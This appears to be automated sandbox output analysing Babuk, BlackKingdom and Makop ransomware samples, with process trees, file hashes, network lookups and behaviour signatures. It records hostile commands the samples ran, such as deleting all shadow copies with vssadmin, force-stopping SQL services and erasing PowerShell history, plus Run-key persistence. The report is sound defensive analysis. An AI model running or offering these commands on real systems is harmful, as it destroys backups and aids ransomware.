| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1344 wrote to memory of 316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | C:\Windows\System32\cmd.exe |
| PID 1344 wrote to memory of 316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | C:\Windows\System32\cmd.exe |
| PID 316 wrote to memory of 4760 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 316 wrote to memory of 4760 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 1344 wrote to memory of 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | C:\Windows\System32\cmd.exe |
| PID 1344 wrote to memory of 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe | C:\Windows\System32\cmd.exe |
| PID 3296 wrote to memory of 4340 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 3296 wrote to memory of 4340 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\vssadmin.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
C:\Recovery\WindowsRE\How To Restore Your Files.txt
| MD5 | 81fc4c91a0938482f65a72216cda1e39 |
| SHA1 | 3fb3d27ceb1502ddf0d68fa9251a6aec46036377 |
| SHA256 | 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591 |
| SHA512 | ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1800s
Max time network
1161s
Command Line
Signatures
Loads dropped DLL
Reads user/profile data of web browsers
Drops desktop.ini file(s)
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Service *sql*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell rm (Get-PSReadlineOption).HistorySavePath
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mega.io | udp |
| LU | 66.203.124.37:80 | mega.io | tcp |
| LU | 66.203.124.37:443 | mega.io | tcp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 37.124.203.66.in-addr.arpa | udp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 15.125.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.189.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI42602\ucrtbase.dll
| MD5 | 298e85be72551d0cdd9ed650587cfdc6 |
| SHA1 | 5a82bcc324fb28a5147b4e879b937fb8a56b760c |
| SHA256 | eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84 |
| SHA512 | 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\python37.dll
| MD5 | c4709f84e6cf6e082b80c80b87abe551 |
| SHA1 | c0c55b229722f7f2010d34e26857df640182f796 |
| SHA256 | ca8e39f2b1d277b0a24a43b5b8eada5baf2de97488f7ef2484014df6e270b3f3 |
| SHA512 | e04a5832b9f2e1e53ba096e011367d46e6710389967fa7014a0e2d4a6ce6fc8d09d0ce20cee7e7d67d5057d37854eddab48bef7df1767f2ec3a4ab91475b7ce4 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\VCRUNTIME140.dll
| MD5 | 89a24c66e7a522f1e0016b1d0b4316dc |
| SHA1 | 5340dd64cfe26e3d5f68f7ed344c4fd96fbd0d42 |
| SHA256 | 3096cafb6a21b6d28cf4fe2dd85814f599412c0fe1ef090dd08d1c03affe9ab6 |
| SHA512 | e88e0459744a950829cd508a93e2ef0061293ab32facd9d8951686cbe271b34460efd159fd8ec4aa96ff8a629741006458b166e5cff21f35d049ad059bc56a1a |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ctypes.pyd
| MD5 | 5e869eebb6169ce66225eb6725d5be4a |
| SHA1 | 747887da0d7ab152e1d54608c430e78192d5a788 |
| SHA256 | 430f1886caf059f05cde6eb2e8d96feb25982749a151231e471e4b8d7f54f173 |
| SHA512 | feb6888bb61e271b1670317435ee8653dedd559263788fbf9a7766bc952defd7a43e7c3d9f539673c262abedd97b0c4dd707f0f5339b1c1570db4e25da804a16 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\base_library.zip
| MD5 | a70f10b994f5b2e03777b4d355eef788 |
| SHA1 | 141be3cef837cf6120f71c714259d9799586b483 |
| SHA256 | 766089d80d0136ce9a4f24f1dd717a8575b0075c5d9c3c72b84807e0647ffa2c |
| SHA512 | 5651e26f0a3de35e455977d3cfc06e2b38defe5e52656e3213177a0a621eca3b3391bf414371cecf88d9ff903747231092b8d1d2206d5f020e1c438c70d8eb38 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\select.pyd
| MD5 | fb4a0d7abaeaa76676846ad0f08fefa5 |
| SHA1 | 755fd998215511506edd2c5c52807b46ca9393b2 |
| SHA256 | 65a3c8806d456e9df2211051ed808a087a96c94d38e23d43121ac120b4d36429 |
| SHA512 | f5b3557f823ee4c662f2c9b7ecc5497934712e046aa8ae8e625f41756beb5e524227355316f9145bfabb89b0f6f93a1f37fa94751a66c344c38ce449e879d35f |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_ssl.pyd
| MD5 | 5a393bb4f3ae499541356e57a766eb6a |
| SHA1 | 908f68f4ea1a754fd31edb662332cf0df238cf9a |
| SHA256 | b6593b3af0e993fd5043a7eab327409f4bf8cdcd8336aca97dbe6325aefdb047 |
| SHA512 | 958584fd4efaa5dd301cbcecbfc8927f9d2caec9e2826b2af9257c5eefb4b0b81dbbadbd3c1d867f56705c854284666f98d428dc2377ccc49f8e1f9bbbed158f |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\libssl-1_1.dll
| MD5 | bc778f33480148efa5d62b2ec85aaa7d |
| SHA1 | b1ec87cbd8bc4398c6ebb26549961c8aab53d855 |
| SHA256 | 9d4cf1c03629f92662fc8d7e3f1094a7fc93cb41634994464b853df8036af843 |
| SHA512 | 80c1dd9d0179e6cc5f33eb62d05576a350af78b5170bfdf2ecda16f1d8c3c2d0e991a5534a113361ae62079fb165fff2344efd1b43031f1a7bfda696552ee173 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_tkinter.pyd
| MD5 | 09f66528018ffef916899845d6632307 |
| SHA1 | cf9ddad46180ef05a306dcb05fdb6f24912a69ce |
| SHA256 | 34d89fe378fc10351d127fb85427449f31595eccf9f5d17760b36709dd1449b9 |
| SHA512 | ed406792d8a533db71bd71859edbb2c69a828937757afec1a83fd1eacb1e5e6ec9afe3aa5e796fa1f518578f6d64ff19d64f64c9601760b7600a383efe82b3de |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl\encoding\cp1252.enc
| MD5 | 5900f51fd8b5ff75e65594eb7dd50533 |
| SHA1 | 2e21300e0bc8a847d0423671b08d3c65761ee172 |
| SHA256 | 14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0 |
| SHA512 | ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_lzma.pyd
| MD5 | 5fbb728a3b3abbdd830033586183a206 |
| SHA1 | 066fde2fa80485c4f22e0552a4d433584d672a54 |
| SHA256 | f9bc6036d9e4d57d08848418367743fb608434c04434ab07da9dabe4725f9a9b |
| SHA512 | 31e7c9fe9d8680378f8e3ea4473461ba830df2d80a3e24e5d02a106128d048430e5d5558c0b99ec51c3d1892c76e4baa14d63d1ec1fc6b1728858aa2a255b2fb |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\unicodedata.pyd
| MD5 | 4d3d8e16e98558ff9dac8fc7061e2759 |
| SHA1 | c918ab67b580f955b6361f9900930da38cec7c91 |
| SHA256 | 016d962782beae0ea8417a17e67956b27610f4565cff71dd35a6e52ab187c095 |
| SHA512 | 0dfabfad969da806bc9c6c664cdf31647d89951832ff7e4e5eeed81f1de9263ed71bddeff76ebb8e47d6248ad4f832cb8ad456f11e401c3481674bd60283991a |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ofb.cp37-win_amd64.pyd
| MD5 | 22d65fdceebad51d277a2d8db999b237 |
| SHA1 | f65ed91b8bab5c2766f4aeaa86580de0017770ad |
| SHA256 | 3a4a5aaaa9a80180601376412180b024dbd43c1a3c313dc408dcdd5ee208cd6a |
| SHA512 | d574e7ba77d4bcea014742678608ce46b51b585a6cc8b6e2a2c064b426042c769083f5a74cebe00800283e6efc8f7b079ef0720c2a7bf51098b5f51978419dc9 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_BLAKE2s.cp37-win_amd64.pyd
| MD5 | f79a4c8843675e13fc0d4f057faec76a |
| SHA1 | 80f8d466d2a42a3b278db0f6edb7e60c2f5afa26 |
| SHA256 | e4f57da1c2ae72d2ab4980a2ffa370ac0cf1f3f8c76273dcea3c28fd5c858c1e |
| SHA512 | 7955edd12c426599c5103fc71d4fa051092584e5bf6755beee5bbb76977927093ec6b73eaec0276de6e3e28e4f3e1ca0507d1b4a85eeba14f2e5b6032401715d |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_Salsa20.cp37-win_amd64.pyd
| MD5 | 2b6eac8d1d5cd08279f4c711f84e3953 |
| SHA1 | c1b44d08dcf6fe7f50a1707d91f606b70538ce62 |
| SHA256 | a05ffcf7b30d87021f67dc94324f4e7e0481809b07f59cbc77b6798aeb319e7b |
| SHA512 | 827215a6894c20e9dde798a660ba49f5810d48d50f75cbbe88607254dbd5bad9518c612f1a06fdd932e3836e928ef9f04df7ce4800614e09ca74fffc0070b86d |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_MD5.cp37-win_amd64.pyd
| MD5 | 9172a2fc5c66fff01f12676d16d8e882 |
| SHA1 | ee71eafd922f0ee24f1559c63dd8c82b16dbba00 |
| SHA256 | 1143956ef572524ca0a4db6e55b918d7e3e137fa87d15df31ae4f8a4d5c6334b |
| SHA512 | 8a70a90edbac647d04444e5c926d7619d200632192e978fb56f9597583d3cd4ed8dcb5a0db89f0d3f89a41157388d51a3ab3eca7bc19d37da6917ca954ee0741 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_SHA256.cp37-win_amd64.pyd
| MD5 | fd2bab04dcf785080fd7e6aa1abdb566 |
| SHA1 | 9eece186b95a4a6ffa8fadca283ebd2e1f60a340 |
| SHA256 | a660650ba2a0914d510d931458bf93a2e2479cf5922bd830f55ff74deebb19c9 |
| SHA512 | 5ba2a7e097506c18c5ac74c0adac276b137b04185286fc7f2151dc7e7628c044a99d062b123c56dcf2d409dea1b9a5624a08899f5b7735a233f465317e8cfac5 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Hash\_SHA1.cp37-win_amd64.pyd
| MD5 | 609daa8ccbefeda1291d663235c257eb |
| SHA1 | 3a7232f1f6c6b1c03963316c45b7ae335fd9ede6 |
| SHA256 | 28cca9038d7f709a8cc251cc664195c68f65d61832547459fb8b3021044fe6da |
| SHA512 | 028a198e5c8b2f2f7bf8df716a06b5ffae0a875a9ac4d42c1bc64e4232e1d0700f79a01485a87c8fa7515e7c458912ef89487f4aea77fd769bd32e02ce3b1c64 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Util\_strxor.cp37-win_amd64.pyd
| MD5 | 7d2ed7ed7b5f765f13123a905abdd190 |
| SHA1 | 6c99d801d39c13f86352762d3c150f0c4ff2918b |
| SHA256 | 0dcbf6c5d564b77d40cc71096769ab89092b946dd8ebde2a0effb0c28b36ef3a |
| SHA512 | 9d5f307ae558ba62abc2b44b8dd3205a7a7c7524253662ba6f427288695aa41e02ac28785ab77b95a0961bff8b5860fd5b20b54438b280bf9f6cb2523dcedac6 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ctr.cp37-win_amd64.pyd
| MD5 | d02012848d57be3b3967d379ea42426e |
| SHA1 | 69610f7f1f35830639cdcf74f99a20be5bb011c7 |
| SHA256 | cc1782f000f855b66ff94ddbb34dae3aa520c3fbb98b972c5561f2745791849d |
| SHA512 | 51f2dbc9f74b9190fa1f395cac5e8e1b60ac3181da169477e7510411700d42bdcf426285cce8a09983eaa84597621c892d5dc360c56231031e2fc702cddd1be1 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_cfb.cp37-win_amd64.pyd
| MD5 | 00afcb334aa9cbc635ffb7864d487bca |
| SHA1 | 9b0c29dc4c01984ef63d2b868b7d27637aeabde2 |
| SHA256 | 69e5945cde019e9dcdc23404e81fcc7dd2313eebf259daa3a5af537eaf418267 |
| SHA512 | ef1b73b5906713f9b90afc41c60a29d45a1630a6ab1c22be1cc7aa72dc5db7b7bc90dfce1eefda9167a98e911952f7232c5c0f1c4e043428d292cf64fbae284b |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_cbc.cp37-win_amd64.pyd
| MD5 | b768eda0fa972c9cd34cebc1e7c4b54e |
| SHA1 | 95967222a6902226e9bc94bc1503c1638fbcc7cc |
| SHA256 | 4e872e1aa9229a3e95a970af1b6a71c17c5ab84e53a57012c5c7c4412fafeb3f |
| SHA512 | fcf4de7f5be68bb029cd5f6a6413ce3fc1db0ea3d58152b766f86ae1c81653ac9c1b303b8622bb2a34b254f1b9f33e8422b42642992936512d80f435e5229690 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\Crypto\Cipher\_raw_ecb.cp37-win_amd64.pyd
| MD5 | ea90e3f80b3f3d089e20514e52cae4bb |
| SHA1 | 2bd4a5e1b0871ef7ca753b635101216422260eee |
| SHA256 | 256f905da0b889b74dcc0ed69a090f26b92e82936e1b149ed1c6d413b45eff96 |
| SHA512 | 8a8715842b1773386aa75a4eb7136cb8c43da3330e54eddf952469e165c59fe8ce3ed439db6b89e24d1640cec3c64ca2bb3d673727d6a90e9cbd161602d7692c |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\certifi\cacert.pem
| MD5 | 1ba3b44f73a6b25711063ea5232f4883 |
| SHA1 | 1b1a84804f896b7085924f8bf0431721f3b5bdbe |
| SHA256 | bb77f13d3fbec9e98bbf28ac95046b44196c7d8f55ab7720061e99991a829197 |
| SHA512 | 0dd2a14331308b1de757d56fab43678431e0ad6f5f5b12c32fa515d142bd955f8be690b724e07f41951dd03c9fee00e604f4e0b9309da3ea438c8e9b56ca581b |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_cpyHook.cp37-win_amd64.pyd
| MD5 | 3271deb52590ba75eadbd732e859ea51 |
| SHA1 | a001ed3664f9fb87a6b52411438157f4619f50fd |
| SHA256 | dc80b2f6122ff5f6b8bb37068f602809e9d4e54eaed70b6ae5b22901c83b3993 |
| SHA512 | 472d9dc42cceb0c569b8f40c3a9d5844dd131bad02e206f7f4fbdc48c6c109f770bd3a69af6d37482d2cea1a23bad58b1c1642caf905df056668127dc1c2adf8 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_bz2.pyd
| MD5 | cf77513525fc652bad6c7f85e192e94b |
| SHA1 | 23ec3bb9cdc356500ec192cac16906864d5e9a81 |
| SHA256 | 8bce02e8d44003c5301608b1722f7e26aada2a03d731fa92a48c124db40e2e41 |
| SHA512 | dbc1ba8794ce2d027145c78b7e1fc842ffbabb090abf9c29044657bdecd44396014b4f7c2b896de18aad6cfa113a4841a9ca567e501a6247832b205fe39584a9 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_queue.pyd
| MD5 | c0a70188685e44e73576e3cd63fc1f68 |
| SHA1 | 36f88ca5c1dda929b932d656368515e851aeb175 |
| SHA256 | e499824d58570c3130ba8ef1ac2d503e71f916c634b2708cc22e95c223f83d0a |
| SHA512 | b9168bf1b98da4a9dfd7b1b040e1214fd69e8dfc2019774890291703ab48075c791cc27af5d735220bd25c47643f098820563dc537748471765aff164b00a4aa |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl\init.tcl
| MD5 | b900811a252be90c693e5e7ae365869d |
| SHA1 | 345752c46f7e8e67dadef7f6fd514bed4b708fc5 |
| SHA256 | bc492b19308bc011cfcd321f1e6e65e6239d4eeb620cc02f7e9bf89002511d4a |
| SHA512 | 36b8cdba61b9222f65b055c0c513801f3278a3851912215658bcf0ce10f80197c1f12a5ca3054d8604da005ce08da8dcd303b8544706b642140a49c4377dd6ce |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\tk86t.dll
| MD5 | fdc8a5d96f9576bd70aa1cadc2f21748 |
| SHA1 | bae145525a18ce7e5bc69c5f43c6044de7b6e004 |
| SHA256 | 1a6d0871be2fa7153de22be008a20a5257b721657e6d4b24da8b1f940345d0d5 |
| SHA512 | 816ada61c1fd941d10e6bb4350baa77f520e2476058249b269802be826bab294a9c18edc5d590f5ed6f8dafed502ab7ffb29db2f44292cb5bedf2f5fa609f49c |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\tcl86t.dll
| MD5 | c0b23815701dbae2a359cb8adb9ae730 |
| SHA1 | 5be6736b645ed12e97b9462b77e5a43482673d90 |
| SHA256 | f650d6bc321bcda3fc3ac3dec3ac4e473fb0b7b68b6c948581bcfc54653e6768 |
| SHA512 | ed60384e95be8ea5930994db8527168f78573f8a277f8d21c089f0018cd3b9906da764ed6fcc1bd4efad009557645e206fbb4e5baef9ab4b2e3c8bb5c3b5d725 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_hashlib.pyd
| MD5 | b32cb9615a9bada55e8f20dcea2fbf48 |
| SHA1 | a9c6e2d44b07b31c898a6d83b7093bf90915062d |
| SHA256 | ca4f433a68c3921526f31f46d8a45709b946bbd40f04a4cfc6c245cb9ee0eab5 |
| SHA512 | 5c583292de2ba33a3fc1129dfb4e2429ff2a30eeaf9c0bcff6cca487921f0ca02c3002b24353832504c3eec96a7b2c507f455b18717bcd11b239bbbbd79fadbe |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\libcrypto-1_1.dll
| MD5 | cc4cbf715966cdcad95a1e6c95592b3d |
| SHA1 | d5873fea9c084bcc753d1c93b2d0716257bea7c3 |
| SHA256 | 594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1 |
| SHA512 | 3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477 |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\pywintypes37.dll
| MD5 | 77b6875977e77c4619bbb471d5eaf790 |
| SHA1 | f08c3bc5e918c0a197fbfd1b15e7c0491bd5fade |
| SHA256 | 780a72ba3215ff413d5a9e98861d8bb87c15c43a75bb81dc985034ae7dcf5ef6 |
| SHA512 | 783939fc97b2445dfe7e21eb6b71711aba6d85e275e489eddcc4f20c2ed018678d8d14c9e1856f66e3876f318312d69c22cee77f9105a72e56a1be4f3e8a7c2e |
C:\Users\Admin\AppData\Local\Temp\_MEI42602\_socket.pyd
| MD5 | 8ea18d0eeae9044c278d2ea7a1dbae36 |
| SHA1 | de210842da8cb1cb14318789575d65117d14e728 |
| SHA256 | 9822c258a9d25062e51eafc45d62ed19722e0450a212668f6737eb3bfe3a41c2 |
| SHA512 | d275ce71d422cfaacef1220dc1f35afba14b38a205623e3652766db11621b2a1d80c5d0fb0a7df19402ebe48603e76b8f8852f6cbff95a181d33e797476029f0 |
memory/1104-1095-0x00007FFDCB1A3000-0x00007FFDCB1A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoyjlypg.4tt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1104-1105-0x00000218D01A0000-0x00000218D01C2000-memory.dmp
memory/1104-1106-0x00000218D23F0000-0x00000218D2434000-memory.dmp
memory/1104-1107-0x00000218D2440000-0x00000218D24B6000-memory.dmp
memory/1104-1108-0x00007FFDCB1A0000-0x00007FFDCBC61000-memory.dmp
memory/1104-1109-0x00007FFDCB1A0000-0x00007FFDCBC61000-memory.dmp
memory/1104-1112-0x00007FFDCB1A0000-0x00007FFDCBC61000-memory.dmp
C:\Recovery\decrypt_file.TxT
| MD5 | 2772699925346e374b9a2031385cf42f |
| SHA1 | dac85ee34a2b0e65623bbd572648ba73e5995fc6 |
| SHA256 | a5fa6416005be0c9de0e09faea13d40994292776c1036776282993dc6fb7bcf9 |
| SHA512 | 081121b2aaf12e0f10b23b3d1423bfdf7ff36bdea199630852723c1aa25468390e73232fa56dd05a3bf6ed166bf695b0ac2ce03e33d0d0a3fc1b24c2d6e9ddfd |
Analysis: behavioral31
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:13
Platform
win7-20240704-en
Max time kernel
1798s
Max time network
1565s
Command Line
Signatures
Makop
Deletes shadow copies
Renames multiple (8801) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\MAKOP_27_10_2020_115KB.exe\"" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0286034.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\settings.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03236_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\TipBand.dll.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe | N/A |
